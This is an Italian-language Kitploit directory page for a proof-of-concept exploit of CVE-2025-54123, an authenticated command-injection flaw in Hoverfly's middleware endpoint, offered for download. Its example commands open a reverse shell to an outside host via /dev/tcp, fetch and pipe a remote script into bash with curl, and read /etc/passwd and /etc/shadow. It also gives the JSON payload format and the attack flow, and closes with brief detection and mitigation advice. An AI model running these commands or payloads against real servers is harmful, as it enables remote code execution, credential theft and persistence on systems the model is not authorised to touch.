Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/kasem545/cve-2025-54123-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitPenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHubkasem545/cve-2025-54123-poc

CVE-2025-54123-Poc

CVE-2025-54123 Hoverfly Iniezione di comandi nel middleware autenticato RCE

Vedi Repository
725 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-54123 Exploit

Hoverfly - Iniezione di comandi nel middleware autenticato (RCE) | CVSS 9.8 CRITICO

Vulnerabilità

Hoverfly <= 1.11.3 è vulnerabile a un'iniezione di comandi autenticata attraverso l'endpoint /api/v2/hoverfly/middleware. Sono richieste credenziali di amministratore, ma una volta autenticato, la funzionalità middleware accetta valori binari e script forniti dall'utente senza validazione, consentendo l'esecuzione arbitraria di comandi.

Catena di vulnerabilità

  1. Insufficiente validazione degli input - middleware.go accetta percorsi binari arbitrari
  2. Esecuzione non sicura dei comandi - local_middleware.go passa direttamente l'input utente a exec.Command()
  3. Esecuzione immediata - hoverfly_service.go esegue il middleware durante la validazione

Requisiti

  • Credenziali di amministratore Hoverfly valide (username/password)
  • Accesso all'API di amministrazione di Hoverfly (porta predefinita 8888)

Utilizzo

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> -c <COMMAND> [--shell SHELL]
  • -t, --target - Hoverfly API endpoint (required)
  • -u, --username - Admin username (required)
  • -p, --password - Admin password (required)
  • -c, --command - Command to execute (required)
  • --shell - Shell binary to use (default: /bin/bash)

Esempi

root@kitploit:~
# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami

# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"

# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"

# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh

# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"

Flusso di attacco

  1. L'attaccante si autentica con credenziali di amministratore valide (Basic Auth)
  2. Invia una richiesta PUT a /api/v2/hoverfly/middleware con un payload dannoso
  3. Hoverfly scrive lo script in un file temporaneo /tmp/hoverfly_<random>
  4. Durante la validazione, esegue: <shell> /tmp/hoverfly_<random>
  5. L'output del comando viene restituito nella sezione STDOUT della risposta di errore
  6. L'exploit estrae e mostra l'output

Struttura del payload

root@kitploit:~
{
    "binary": "/bin/bash",
    "script": "whoami"
}

Le intestazioni HTTP includono:

root@kitploit:~
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json

Impatto

  • Esecuzione completa di codice remoto con privilegi del processo Hoverfly
  • Furto di credenziali - rubare chiavi API, token, segreti
  • Pivot sulla rete interna - compromettere sistemi adiacenti
  • Esfiltrazione di dati - accedere a dati di simulazione, configurazioni
  • Persistenza - installare backdoor, mantenere l'accesso
  • Interruzione del servizio - modificare/eliminare configurazioni middleware

Posizioni del codice vulnerabile

  • core/middleware/middleware.go:94-96 - Nessuna validazione dell'input sul parametro binary
  • core/middleware/local_middleware.go:14-19 - Uso non sicuro di exec.Command()
  • core/hoverfly_service.go:173 - Esecuzione immediata durante la validazione

Versioni interessate

  • Hoverfly <= 1.11.3
  • Tutte le installazioni con API di amministrazione accessibile e autenticazione abilitata

Rilevamento

Cerca:

  • Richieste PUT a /api/v2/hoverfly/middleware
  • Risposte di errore contenenti "STDOUT:" con output del comando
  • File temporanei in /tmp/hoverfly/
  • Esecuzioni di processo insolite dal servizio hoverfly

Mitigazione

  • Aggiornare alla versione corretta (se disponibile)
  • Limitare l'accesso all'API di amministrazione solo a IP fidati
  • Utilizzare credenziali di autenticazione forti
  • Monitorare l'accesso all'endpoint /api/v2/hoverfly/middleware
  • Implementare la validazione dell'input sui parametri binary/script

Riferimenti

  • CVE-2025-54123
  • CWE-78 (Iniezione di comandi del sistema operativo)
  • CWE-20 (Validazione dell'input impropria)
  • GHSA-r4h8-hfp2-ggmf
  • https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  • https://nvd.nist.gov/vuln/detail/CVE-2025-54123

Crediti

Scoperta originale: @Kr1shna4garwal

Scarica lo strumento